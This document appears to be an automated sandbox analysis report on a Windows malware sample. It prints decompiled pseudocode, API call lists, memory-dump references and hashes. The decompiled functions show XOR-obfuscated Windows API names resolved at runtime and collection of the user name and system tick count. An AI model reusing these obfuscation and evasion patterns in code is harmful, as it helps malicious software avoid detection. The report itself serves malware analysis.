• Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
• Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
• Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
• Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
• Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
• Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
• Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: ControlDevice$CreateFile
                                                                • String ID: !*$'9$+'$5a$?4
                                                                • API String ID: 1161430685-691340170
                                                                • Opcode ID: de8af43add4b4696411f93668c0d71af87a08f6f9fcf59cd9ddde096ab2db641
                                                                • Instruction ID: 31a3ea34ae874c4489ce73d3fc5cb2bb24c14872548f2391b6f46e6f9134a2cd
                                                                • Opcode Fuzzy Hash: de8af43add4b4696411f93668c0d71af87a08f6f9fcf59cd9ddde096ab2db641
                                                                • Instruction Fuzzy Hash: 0751C0B4900309AFEB20DFE4D980BEEBBF8FF14304F50066EE581A6241E7745A09CB61
Uniqueness
Uniqueness Score: -1.00%

                                                                C-Code - Quality: 45%
                                                                			E010211D4() {
                                                                				signed int _v5;
                                                                				signed int _v6;
                                                                				signed int _v12;
                                                                				char _v13;
                                                                				char _v14;
                                                                				char _v15;
                                                                				char _v16;
                                                                				intOrPtr _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				intOrPtr _v32;
                                                                				intOrPtr _v36;
                                                                				signed int _v40;
                                                                				char _v64;
                                                                				char _v88;
                                                                				char _v112;
                                                                				void* _t62;
                                                                				signed int* _t88;
                                                                				intOrPtr _t90;
                                                                				intOrPtr _t104;
                                                                				signed char _t121;
                                                                				void* _t131;
                                                                				signed int _t143;
                                                                				signed int _t144;
                                                                				signed int _t145;
                                                                				void* _t146;
                                                                				void* _t147;
                                                                				void* _t148;
                                                                				void* _t149;
                                                                				void* _t152;
                                                                				void* _t153;
                                                                				void* _t154;
                                                                				void* _t155;
                                                                
                                                                				_v12 = _v12 & 0x00000000;
                                                                				_t62 = E010AE087(0x10ccfc8, 0, _t155);
                                                                				_t123 = 0xa;
                                                                				if(_t62 < 0x12c) {
                                                                					L17:
                                                                					_v24 = 0x11223344;
                                                                					_t144 = _t143 ^ _v24;
                                                                					__eflags = _t144 - _v24;
                                                                					if(__eflags == 0) {
                                                                						L22:
                                                                						ss =  *((intOrPtr*)(_t62 - 0x716f6f70));
                                                                						if(__eflags == 0) {
                                                                							L8:
                                                                							L15:
                                                                							E010944B3(_t123);
                                                                							return _v40;
                                                                						}
                                                                						asm("invalid");
                                                                						goto L24;
                                                                					} else {
                                                                						if(__eflags != 0) {
                                                                							L24:
                                                                							_t145 = _t144 ^ _v24;
                                                                							__eflags = 1;
                                                                							if(1 == 0) {
                                                                								__eflags = 0;
                                                                								return 0;
                                                                							}
                                                                							_t146 = _t145 - 0x18;
                                                                							E01094552(_t146, 0x10c19d8);
                                                                							_t48 = 0 + "exe"; // 0x57006578
                                                                							_v16 = E01045177( *_t48 & 0x000000ff, 0);
                                                                							_v15 = E01045177( *((1 << 0) + "exe") & 0x000000ff, 1);
                                                                							_v14 = E01045177( *((1 << 1) + "exe") & 0x000000ff, 2);
                                                                							__eflags = 0;
                                                                							_v13 = 0;
                                                                							_t147 = _t146 - 0x18;
                                                                							E01094552(_t147, 0x10ccf08);
                                                                							_t148 = _t147 - 0x18;
                                                                							E0109451E(_t148, E0104509F( &_v16));
                                                                							_t88 = E010A47CC();
                                                                							_t149 = _t148 + 0x48;
                                                                							if(__eflags == 0) {
                                                                								_t131 = _t149 - 0x18;
                                                                								E01094552(_t131, 0x10c19d8); // executed
                                                                								_t90 = E010A4E2A(__eflags); // executed
                                                                								_v32 = _t90;
                                                                								if(__eflags != 0 && __eflags == 0) {
                                                                									0x77021375();
                                                                								}
                                                                								_push(0xffffffff);
                                                                								_push(_v32);
                                                                								_push("WaitForSingleObject");
                                                                							}
                                                                							if (__eflags != 0) goto L29;
                                                                							 *_t88 = _t88 +  *_t88;
                                                                							 *_t88 = _t88 +  *_t88;
                                                                							__eflags =  *_t88;
                                                                						}
                                                                						if(__eflags != 0) {
                                                                							asm("invalid");
                                                                						}
                                                                						goto L22;
                                                                					}
                                                                				}
                                                                				_v5 = 0;
                                                                				E01093211( &_v64); // executed
                                                                				_t152 = _t143 - 0x18;
                                                                				E01094552(_t152,  &_v64);
                                                                				_t153 = _t152 - 0x18;
                                                                				E01094552(_t153, 0x10cced8);
                                                                				_t154 = _t153 - 0x18;
                                                                				E01094552(_t154, 0x10ccf38); // executed
                                                                				_t104 = E01093828(); // executed
                                                                				_t143 = _t154 + 0x48;
                                                                				_v36 = _t104;
                                                                				_v20 = _v36;
                                                                				if(_v20 == 0) {
                                                                					L13:
                                                                					__eflags = _v5 & 0x000000ff;
                                                                					if((_v5 & 0x000000ff) != 0) {
                                                                						_t123 =  &_v64;
                                                                						_t62 = E010944B3( &_v64);
                                                                						goto L17;
                                                                					}
                                                                					_t38 =  &_v40;
                                                                					 *_t38 = _v40 & 0x00000000;
                                                                					__eflags =  *_t38;
                                                                					_t123 =  &_v64;
                                                                					goto L15;
                                                                				}
                                                                				E0109451E( &_v112, "status");
                                                                				_v12 = _v12 | 0x00000001;
                                                                				if((E010948B9(_v20,  &_v112) & 0x000000ff) == 0) {
                                                                					L5:
                                                                					_t23 =  &_v28;
                                                                					 *_t23 = _v28 & 0x00000000;
                                                                					__eflags =  *_t23;
                                                                					L6:
                                                                					_v6 = _v28;
                                                                					if((_v12 & 0x00000002) == 0) {
                                                                						__eflags = _v12 & 0x00000001;
                                                                						if((_v12 & 0x00000001) != 0) {
                                                                							_t32 =  &_v12;
                                                                							 *_t32 = _v12 & 0xfffffffe;
                                                                							__eflags =  *_t32;
                                                                							E010944B3( &_v112);
                                                                						}
                                                                						__eflags = _v6 & 0x000000ff;
                                                                						if((_v6 & 0x000000ff) != 0) {
                                                                							_v5 = 1;
                                                                						}
                                                                						goto L13;
                                                                					}
                                                                					_v12 = _v12 & 0xfffffffd;
                                                                					_t123 =  &_v88;
                                                                					E010944B3( &_v88);
                                                                					goto L8;
                                                                				}
                                                                				E0109451E( &_v88, "status");
                                                                				_v12 = _v12 | 0x00000002;
                                                                				_t121 = E010A0CF8( &_v88);
                                                                				asm("movsd xmm0, [0x10bccf0]");
                                                                				asm("ucomisd xmm0, [eax]");
                                                                				asm("lahf");
                                                                				if((_t121 & 0x00000044) != 0) {
                                                                					goto L5;
                                                                				}
                                                                				_v28 = 1;
                                                                				goto L6;
                                                                			}
                                                                0x00000000
                                                                0x01021324
                                                                0x01021320
                                                                0x010211fb
                                                                0x01021202
                                                                0x01021207
                                                                0x01021210
                                                                0x01021215
                                                                0x0102121f
                                                                0x01021224
                                                                0x0102122e
                                                                0x01021233
                                                                0x01021238
                                                                0x0102123b
                                                                0x01021241
                                                                0x01021248
                                                                0x010212e8
                                                                0x010212ec
                                                                0x010212ee
                                                                0x01021304
                                                                0x01021307
                                                                0x00000000
                                                                0x01021307
                                                                0x010212f0
                                                                0x010212f0
                                                                0x010212f0
                                                                0x010212f4
                                                                0x00000000
                                                                0x010212f4
                                                                0x01021256
                                                                0x0102125b
                                                                0x01021270
                                                                0x010212aa
                                                                0x010212aa
                                                                0x010212aa
                                                                0x010212aa
                                                                0x010212ae
                                                                0x010212b1
                                                                0x010212ba
                                                                0x010212cb
                                                                0x010212ce
                                                                0x010212d0
                                                                0x010212d0
                                                                0x010212d0
                                                                0x010212d7
                                                                0x010212d7
                                                                0x010212e0
                                                                0x010212e2
                                                                0x010212e4
                                                                0x010212e4
                                                                0x00000000
                                                                0x010212e2
                                                                0x010212bc
                                                                0x010212c0
                                                                0x010212c3
                                                                0x00000000
                                                                0x010212c3
                                                                0x0102127a
                                                                0x0102127f
                                                                0x0102128a
                                                                0x0102128f
                                                                0x01021297
                                                                0x0102129b
                                                                0x0102129f
                                                                0x00000000
                                                                0x00000000
                                                                0x010212a1
                                                                0x00000000

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,000000FF,000000FF), ref: 01021416
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0102141D
                                                                  • Part of subcall function 01093211: GetTickCount.KERNEL32 ref: 0109324C
                                                                  • Part of subcall function 01093211: GetUserNameA.ADVAPI32(?,?), ref: 010932AC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: AddressCountLibraryLoadNameProcTickUser
                                                                • String ID: Kernel32.dll$WaitForSingleObject$exe$status
                                                                • API String ID: 3324814288-1373669212
                                                                • Opcode ID: e3b66abd1c5c22a358b881aab8d8bdd800a14da27d870360ebb96846acbf9e12
                                                                • Instruction ID: b5103372605a1cb645bd0b58adb43129c8601c9018f0bd280411c90825ea6851
                                                                • Opcode Fuzzy Hash: e3b66abd1c5c22a358b881aab8d8bdd800a14da27d870360ebb96846acbf9e12
                                                                • Instruction Fuzzy Hash: F7610671D0025AABDF04FBF9CD55AFD7BB4AF22200F4041A9E1D1FA191DE348A09CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E010A5551(CHAR* __ecx) {
                                                                				char _v5;
                                                                				intOrPtr _v9;
                                                                				intOrPtr _v13;
                                                                				char _v17;
                                                                				char _v18;
                                                                				signed char _v19;
                                                                				signed char _v20;
                                                                				signed char _v21;
                                                                				signed char _v22;
                                                                				signed char _v23;
                                                                				signed char _v24;
                                                                				signed char _v25;
                                                                				signed char _v26;
                                                                				signed char _v27;
                                                                				signed char _v28;
                                                                				signed char _v29;
                                                                				signed char _v30;
                                                                				signed char _v31;
                                                                				signed char _v32;
                                                                				signed char _v33;
                                                                				signed char _v34;
                                                                				signed char _v35;
                                                                				signed char _v36;
                                                                				signed char _t28;
                                                                				signed char _t30;
                                                                				signed char _t32;
                                                                				signed char _t34;
                                                                				signed char _t36;
                                                                				signed char _t38;
                                                                				signed char _t40;
                                                                				signed char _t42;
                                                                				signed char _t44;
                                                                				signed char _t46;
                                                                				signed char _t48;
                                                                				signed char _t50;
                                                                				signed char _t52;
                                                                				signed char _t54;
                                                                				signed char _t56;
                                                                				signed char _t58;
                                                                				signed char _t60;
                                                                				signed char _t62;
                                                                				CHAR* _t64;
                                                                				signed int _t68;
                                                                
                                                                				_t28 = "GetFileAttributesA"; // 0x47
                                                                				_v18 = 0;
                                                                				_v36 = _t28 ^ 0x00000040;
                                                                				_t30 = M010C2B89; // 0x65
                                                                				_v17 = 0x2d30242b;
                                                                				_v35 = _t30 ^ 0x00000041;
                                                                				_t32 = M010C2B8A; // 0x74
                                                                				_v13 = 0x75752921;
                                                                				_v34 = _t32 ^ 0x00000042;
                                                                				_t34 = M010C2B8B; // 0x46
                                                                				_v9 = 0x27262d66;
                                                                				_v33 = _t34 ^ 0x00000043;
                                                                				_t36 = M010C2B8C; // 0x69
                                                                				_v5 = 0;
                                                                				_v32 = _t36 ^ 0x00000044;
                                                                				_t38 = M010C2B8D; // 0x6c
                                                                				_v31 = _t38 ^ 0x00000045;
                                                                				_t40 = M010C2B8E; // 0x65
                                                                				_v30 = _t40 ^ 0x00000046;
                                                                				_t42 = M010C2B8F; // 0x41
                                                                				_v29 = _t42 ^ 0x00000047;
                                                                				_t44 = M010C2B90; // 0x74
                                                                				_v28 = _t44 ^ 0x00000048;
                                                                				_t46 = M010C2B91; // 0x74
                                                                				_v27 = _t46 ^ 0x00000049;
                                                                				_t48 = M010C2B92; // 0x72
                                                                				_v26 = _t48 ^ 0x0000004a;
                                                                				_t50 = M010C2B93; // 0x69
                                                                				_v25 = _t50 ^ 0x0000004b;
                                                                				_t52 = M010C2B94; // 0x62
                                                                				_v24 = _t52 ^ 0x0000004c;
                                                                				_t54 =  *0x10c2b95; // 0x75
                                                                				_v23 = _t54 ^ 0x0000004d;
                                                                				_t56 =  *0x10c2b96; // 0x74
                                                                				_v22 = _t56 ^ 0x0000004e;
                                                                				_t58 =  *0x10c2b97; // 0x65
                                                                				_v21 = _t58 ^ 0x0000004f;
                                                                				_t60 =  *0x10c2b98; // 0x73
                                                                				_v20 = _t60 ^ 0x00000050;
                                                                				_t62 =  *0x10c2b99; // 0x41
                                                                				_v19 = _t62 ^ 0x00000051;
                                                                				_t64 = E010451BC( &_v36);
                                                                				_t25 =  &_v17; // 0x2d30242b
                                                                				GetProcAddress(LoadLibraryA(E010451D7(_t25)), _t64); // executed
                                                                				_t68 = GetFileAttributesA(__ecx); // executed
                                                                				return _t68 & 0xffffff00 | _t68 != 0xffffffff;
                                                                			}

                                                                Instruction addresses (listing residue; only the address column of the disassembly survived): 0x010a5557 - 0x010a5651

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 010A563B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A5642
                                                                • GetFileAttributesA.KERNELBASE(?,?,00000000), ref: 010A5648
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp
                                                                Similarity
                                                                • API ID: AddressAttributesFileLibraryLoadProc
                                                                • String ID: +$0-!)uuf-&'$GetFileAttributesA
                                                                • API String ID: 1945639845-1226665172
                                                                • Opcode ID: dcd0dd60609a7ea9db699873097b70569966af4eef4a61afd6d6e9d88da494da
                                                                • Instruction ID: e72dd69d6a1398601d06d91e777ecdbd0ca178c95d187b5e214cf970dd436ace
                                                                • Opcode Fuzzy Hash: dcd0dd60609a7ea9db699873097b70569966af4eef4a61afd6d6e9d88da494da
                                                                • Instruction Fuzzy Hash: 0D31C8A58093CAADCF229FF4A4545EFBFB41D2B350B496185C1E43F647C119034AEBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 94%
                                                                			E01093211(intOrPtr* __ecx) {
                                                                				char _v268;
                                                                				char _v300;
                                                                				void* _v308;
                                                                				char _v316;
                                                                				char _v332;
                                                                				char _v348;
                                                                				char _v356;
                                                                				intOrPtr* _v376;
                                                                				char _v380;
                                                                				char _v384;
                                                                				char _v388;
                                                                				char _v392;
                                                                				char _v396;
                                                                				intOrPtr _v400;
                                                                				char _v404;
                                                                				char _v420;
                                                                				intOrPtr _v424;
                                                                				char _v428;
                                                                				char _v444;
                                                                				char _v452;
                                                                				intOrPtr _v456;
                                                                				char _v460;
                                                                				char _v468;
                                                                				char _v476;
                                                                				intOrPtr _v480;
                                                                				char _v484;
                                                                				char _v492;
                                                                				char _v500;
                                                                				intOrPtr _v504;
                                                                				char _v508;
                                                                				char _v516;
                                                                				char _v524;
                                                                				intOrPtr _v528;
                                                                				char _v532;
                                                                				char _v540;
                                                                				char _v548;
                                                                				intOrPtr _v552;
                                                                				char _v556;
                                                                				char _v564;
                                                                				char _v572;
                                                                				char _v580;
                                                                				char _v596;
                                                                				char _v604;
                                                                				intOrPtr _v608;
                                                                				char _v612;
                                                                				char _v620;
                                                                				char _v624;
                                                                				char _v628;
                                                                				char _v636;
                                                                				char _v644;
                                                                				char _v652;
                                                                				char _v655;
                                                                				signed int _v656;
                                                                				signed int _v660;
                                                                				char _v663;
                                                                				intOrPtr _v664;
                                                                				char _v668;
                                                                				char _v672;
                                                                				char _v674;
                                                                				long _v676;
                                                                				char _v680;
                                                                				char _v684;
                                                                				char _v696;
                                                                				char _v708;
                                                                				char _v716;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				intOrPtr _t155;
                                                                				signed int _t157;
                                                                				intOrPtr _t162;
                                                                				void* _t165;
                                                                				intOrPtr _t172;
                                                                				void* _t176;
                                                                				intOrPtr* _t186;
                                                                				intOrPtr _t187;
                                                                				intOrPtr* _t189;
                                                                				intOrPtr _t190;
                                                                				intOrPtr* _t192;
                                                                				intOrPtr _t193;
                                                                				intOrPtr* _t195;
                                                                				intOrPtr _t196;
                                                                				intOrPtr* _t198;
                                                                				intOrPtr _t199;
                                                                				intOrPtr* _t201;
                                                                				intOrPtr _t202;
                                                                				void* _t229;
                                                                				intOrPtr* _t264;
                                                                				intOrPtr* _t268;
                                                                				char* _t271;
                                                                				intOrPtr* _t272;
                                                                				void* _t275;
                                                                				void* _t276;
                                                                				intOrPtr* _t281;
                                                                				intOrPtr* _t298;
                                                                				intOrPtr* _t302;
                                                                				intOrPtr* _t306;
                                                                				intOrPtr* _t310;
                                                                				intOrPtr* _t314;
                                                                				intOrPtr* _t318;
                                                                				void* _t373;
                                                                				void* _t377;
                                                                				intOrPtr* _t386;
                                                                				intOrPtr* _t388;
                                                                				intOrPtr* _t391;
                                                                				signed int _t395;
                                                                				intOrPtr _t396;
                                                                				intOrPtr* _t398;
                                                                				void* _t399;
                                                                				void* _t400;
                                                                				void* _t401;
                                                                				void* _t402;
                                                                				void* _t403;
                                                                				void* _t404;
                                                                				signed int _t406;
                                                                				void* _t408;
                                                                
                                                                				_t408 = (_t406 & 0xfffffff8) - 0x2a4;
                                                                				_t391 = __ecx;
                                                                				_t268 = 0x10c23dc;
                                                                				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                                                				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                                                                				_t3 = _t268 + 1; // 0x10c23dd
                                                                				_t373 = _t3;
                                                                				 *((char*)(__ecx)) = 0;
                                                                				do {
                                                                					_t155 =  *_t268;
                                                                					_t268 = _t268 + 1;
                                                                				} while (_t155 != 0);
                                                                				E01094686(__ecx, 0x10c23dc, _t268 - _t373);
                                                                				_t157 = GetTickCount();
                                                                				_t271 =  &_v663;
                                                                				do {
                                                                					_t271 = _t271 - 1;
                                                                					_t395 = 0xa;
                                                                					_t6 = _t157 % _t395;
                                                                					_t157 = _t157 / 0x10c23dc;
                                                                					 *_t271 = _t6 + 0x30;
                                                                				} while (_t157 != 0);
                                                                				_v380 = 0;
                                                                				_v396 = 0;
                                                                				_t396 = 0xf;
                                                                				_v376 = 0x10c23dc;
                                                                				if(_t271 !=  &_v655) {
                                                                					E01094686( &_v396, _t271,  &_v655 - _t271);
                                                                				}
                                                                				_v676 = 0x101;
                                                                				GetUserNameA( &_v268,  &_v676); // executed
                                                                				_t272 =  &_v268;
                                                                				_v404 = 0;
                                                                				_v400 = _t396;
                                                                				_t377 = _t272 + 1;
                                                                				_v420 = 0;
                                                                				do {
                                                                					_t162 =  *_t272;
                                                                					_t272 = _t272 + 1;
                                                                				} while (_t162 != 0);
                                                                				E01094686( &_v420,  &_v268, _t272 - _t377);
                                                                				_t165 = E01028388( &_v420, _t377, 0);
                                                                				_pop(_t275);
                                                                				E010282F1(_t275, _t165);
                                                                				_pop(_t276);
                                                                				E0109317E( &_v332, E010282D0(_t276, _t272 - _t377));
                                                                				E010A47F9( &_v356);
                                                                				E010A5652(_t408 - 0x18);
                                                                				E010A5969( &_v636, _t272 - _t377); // executed
                                                                				_v608 = _t396;
                                                                				_v612 = 0;
                                                                				_t281 = 0x10c23dc;
                                                                				_v628 = 0;
                                                                				_t30 = _t281 + 1; // 0x10c23dd
                                                                				_t379 = _t30;
                                                                				do {
                                                                					_t172 =  *_t281;
                                                                					_t281 = _t281 + 1;
                                                                				} while (_t172 != 0);
                                                                				E01094686( &_v620, 0x10c23dc, _t281 - _t379);
                                                                				_t264 = _v636;
                                                                				_t398 =  *_t264;
                                                                				while(1) {
                                                                					_t420 = _t398 - _t264;
                                                                					if(_t398 == _t264) {
                                                                						break;
                                                                					}
                                                                					_v660 = _v660 & 0x00000000;
                                                                					_t35 = _t398 + 8; // 0x10c23e4
                                                                					_v656 = _v656 & 0x00000000;
                                                                					E01094728( &_v676, _t35);
                                                                					_t379 =  &_v624;
                                                                					_t176 = E010947FC( &_v656,  &_v624, "=");
                                                                					__eflags = _v660 - 0x10;
                                                                					_t288 =  >=  ? _v680 :  &_v680;
                                                                					E010944ED( &_v384, E010946CF(_t176,  >=  ? _v680 :  &_v680, _v664));
                                                                					E010944B8( &_v636,  &_v388);
                                                                					E01094615( &_v392);
                                                                					E01094615( &_v672);
                                                                					E01094615( &_v696);
                                                                					_t398 =  *_t398;
                                                                				}
                                                                				E010AE836( &_v300, _t379, _t420); // executed
                                                                				E010A8186( &_v596);
                                                                				_v676 = 0x2d27312f;
                                                                				_t54 =  &_v676; // 0x2d27312f
                                                                				_v672 = 0x222b2c30;
                                                                				_v668 = 0;
                                                                				_t186 = E01045084(_t54);
                                                                				_t380 = _t186;
                                                                				_v428 = 0;
                                                                				_t298 = _t186;
                                                                				_v424 = 0xf;
                                                                				_v444 = 0;
                                                                				_t60 = _t298 + 1; // 0x1
                                                                				_t399 = _t60;
                                                                				do {
                                                                					_t187 =  *_t298;
                                                                					_t298 = _t298 + 1;
                                                                				} while (_t187 != 0);
                                                                				E01094686( &_v444, _t380, _t298 - _t399);
                                                                				_t62 =  &_v684; // 0x2d27312f
                                                                				_v684 = 0x1028232f;
                                                                				_v680 = 0x290f363d;
                                                                				_v676 = 0x262e;
                                                                				_v674 = 0;
                                                                				_t189 = E01045141(_t62);
                                                                				_t381 = _t189;
                                                                				_v460 = 0;
                                                                				_t302 = _t189;
                                                                				_v456 = 0xf;
                                                                				_v476 = 0;
                                                                				_t70 = _t302 + 1; // 0x1
                                                                				_t400 = _t70;
                                                                				do {
                                                                					_t190 =  *_t302;
                                                                					_t302 = _t302 + 1;
                                                                				} while (_t190 != 0);
                                                                				E01094686( &_v468, _t381, _t302 - _t400);
                                                                				_v684 = 0x272c2032;
                                                                				_v680 = 0;
                                                                				_t192 = E010450F0( &_v684);
                                                                				_t382 = _t192;
                                                                				_v484 = 0;
                                                                				_t306 = _t192;
                                                                				_v480 = 0xf;
                                                                				_v500 = 0;
                                                                				_t78 = _t306 + 1; // 0x1
                                                                				_t401 = _t78;
                                                                				do {
                                                                					_t193 =  *_t306;
                                                                					_t306 = _t306 + 1;
                                                                				} while (_t193 != 0);
                                                                				E01094686( &_v492, _t382, _t306 - _t401);
                                                                				_t80 =  &_v684; // 0x272c2032
                                                                				_v684 = 0x33273925;
                                                                				_v680 = 0x2e3125;
                                                                				_t195 = E010450D5(_t80);
                                                                				_t383 = _t195;
                                                                				_v508 = 0;
                                                                				_t310 = _t195;
                                                                				_v504 = 0xf;
                                                                				_v524 = 0;
                                                                				_t86 = _t310 + 1; // 0x1
                                                                				_t402 = _t86;
                                                                				do {
                                                                					_t196 =  *_t310;
                                                                					_t310 = _t310 + 1;
                                                                				} while (_t196 != 0);
                                                                				E01094686( &_v516, _t383, _t310 - _t402);
                                                                				_t88 =  &_v684; // 0x33273925
                                                                				_v684 = 0x262e2826;
                                                                				_v680 = 0x37;
                                                                				_t198 = E01045069(_t88);
                                                                				_t384 = _t198;
                                                                				_v532 = 0;
                                                                				_t314 = _t198;
                                                                				_v528 = 0xf;
                                                                				_v548 = 0;
                                                                				_t94 = _t314 + 1; // 0x1
                                                                				_t403 = _t94;
                                                                				do {
                                                                					_t199 =  *_t314;
                                                                					_t314 = _t314 + 1;
                                                                				} while (_t199 != 0);
                                                                				E01094686( &_v540, _t384, _t314 - _t403);
                                                                				_t96 =  &_v684; // 0x262e2826
                                                                				_v684 = 0x31273235;
                                                                				_v680 = 0x222b242a;
                                                                				_v676 = 0;
                                                                				_t201 = E01045084(_t96);
                                                                				_t385 = _t201;
                                                                				_v556 = 0;
                                                                				_t318 = _t201;
                                                                				_v552 = 0xf;
                                                                				_v572 = 0;
                                                                				_t103 = _t318 + 1; // 0x1
                                                                				_t404 = _t103;
                                                                				do {
                                                                					_t202 =  *_t318;
                                                                					_t318 = _t318 + 1;
                                                                					_t432 = _t202;
                                                                				} while (_t202 != 0);
                                                                				E01094686( &_v564, _t385, _t318 - _t404);
                                                                				_push( &_v404);
                                                                				E0109478A(E0109478A( &_v604, _t385,  &_v452), _t385,  &_v564);
                                                                				_push( &_v316);
                                                                				E010A9083(E0109478A( &_v612, _t385,  &_v484), _t385, _t432, _t206);
                                                                				_push( &_v348);
                                                                				E0109478A(E0109478A( &_v620, _t385,  &_v516), _t385, _t210);
                                                                				_push( &_v380);
                                                                				E0109478A(E0109478A( &_v628, _t385,  &_v548), _t385, _t214);
                                                                				_push( &_v660);
                                                                				E0109478A(E0109478A( &_v636, _t385,  &_v580), _t385, _t218);
                                                                				_push( &_v468);
                                                                				E0109478A(E0109478A( &_v644, _t385,  &_v612), _t385, _t222);
                                                                				_t229 = E010A8DB6( &_v652,  &_v708); // executed
                                                                				E010944B8(_t391, _t229);
                                                                				E01094615( &_v716);
                                                                				_t433 =  *((intOrPtr*)(_t391 + 0x14)) - 0x10;
                                                                				_t386 = _t391;
                                                                				if( *((intOrPtr*)(_t391 + 0x14)) >= 0x10) {
                                                                					_t386 =  *_t391;
                                                                				}
                                                                				E010944B8(_t391, E01094FAD( &_v652, _t386,  *((intOrPtr*)(_t391 + 0x10))));
                                                                				E01094615( &_v656);
                                                                				E010944B8(_t391, E01097A10( &_v656, _t391, _t433));
                                                                				E01094615( &_v660);
                                                                				_t388 = _t391;
                                                                				if( *((intOrPtr*)(_t391 + 0x14)) >= 0x10) {
                                                                					_t388 =  *_t391;
                                                                				}
                                                                				E010944B8(_t391, E01094FAD( &_v652, _t388,  *((intOrPtr*)(_t391 + 0x10))));
                                                                				E01094615( &_v656);
                                                                				_t136 =  &_v680; // 0x222b242a
                                                                				_v680 = 0x22362024;
                                                                				_v676 = 0x79;
                                                                				E010944B8(_t391, E01094866( &_v656, E01045069(_t136), _t391));
                                                                				E01094615( &_v660);
                                                                				E01094615( &_v572);
                                                                				E01094615( &_v548);
                                                                				E01094615( &_v524);
                                                                				E01094615( &_v500);
                                                                				E01094615( &_v476);
                                                                				E01094615( &_v452);
                                                                				E010A81AA(0, _t391);
                                                                				E010A81AA(0, _t391);
                                                                				E01094615( &_v628);
                                                                				E01094395( &_v636, _t404);
                                                                				E01094615( &_v356);
                                                                				E01094615( &_v332);
                                                                				E01094615( &_v428);
                                                                				E01094615( &_v404);
                                                                				return _t391;
                                                                			}
                                                                0x010934ec
                                                                0x010934ee
                                                                0x010934ef
                                                                0x010934fe
                                                                0x01093503
                                                                0x01093507
                                                                0x0109350f
                                                                0x01093517
                                                                0x0109351c
                                                                0x0109351e
                                                                0x01093525
                                                                0x01093527
                                                                0x01093532
                                                                0x01093539
                                                                0x01093539
                                                                0x0109353c
                                                                0x0109353c
                                                                0x0109353e
                                                                0x0109353f
                                                                0x0109354e
                                                                0x01093553
                                                                0x01093557
                                                                0x0109355f
                                                                0x01093566
                                                                0x0109356b
                                                                0x0109356d
                                                                0x01093574
                                                                0x01093576
                                                                0x01093581
                                                                0x01093588
                                                                0x01093588
                                                                0x0109358b
                                                                0x0109358b
                                                                0x0109358d
                                                                0x0109358e
                                                                0x0109359d
                                                                0x010935a2
                                                                0x010935a6
                                                                0x010935ae
                                                                0x010935b6
                                                                0x010935ba
                                                                0x010935bf
                                                                0x010935c1
                                                                0x010935c8
                                                                0x010935ca
                                                                0x010935d5
                                                                0x010935dc
                                                                0x010935dc
                                                                0x010935df
                                                                0x010935df
                                                                0x010935e1
                                                                0x010935e2
                                                                0x010935e2
                                                                0x010935f1
                                                                0x010935fd
                                                                0x01093613
                                                                0x0109361f
                                                                0x01093635
                                                                0x01093641
                                                                0x01093657
                                                                0x01093663
                                                                0x01093679
                                                                0x01093682
                                                                0x01093698
                                                                0x010936a4
                                                                0x010936ba
                                                                0x010936c8
                                                                0x010936d0
                                                                0x010936d9
                                                                0x010936de
                                                                0x010936e2
                                                                0x010936e4
                                                                0x010936e6
                                                                0x010936e6
                                                                0x010936f8
                                                                0x01093701
                                                                0x01093714
                                                                0x0109371d
                                                                0x01093726
                                                                0x01093728
                                                                0x0109372a
                                                                0x0109372a
                                                                0x0109373c
                                                                0x01093745
                                                                0x0109374b
                                                                0x0109374f
                                                                0x01093757
                                                                0x01093772
                                                                0x0109377b
                                                                0x01093787
                                                                0x01093793
                                                                0x0109379f
                                                                0x010937ab
                                                                0x010937b7
                                                                0x010937c3
                                                                0x010937cc
                                                                0x010937d8
                                                                0x010937e1
                                                                0x010937ea
                                                                0x010937f6
                                                                0x01093802
                                                                0x0109380e
                                                                0x0109381a
                                                                0x01093827

                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 0109324C
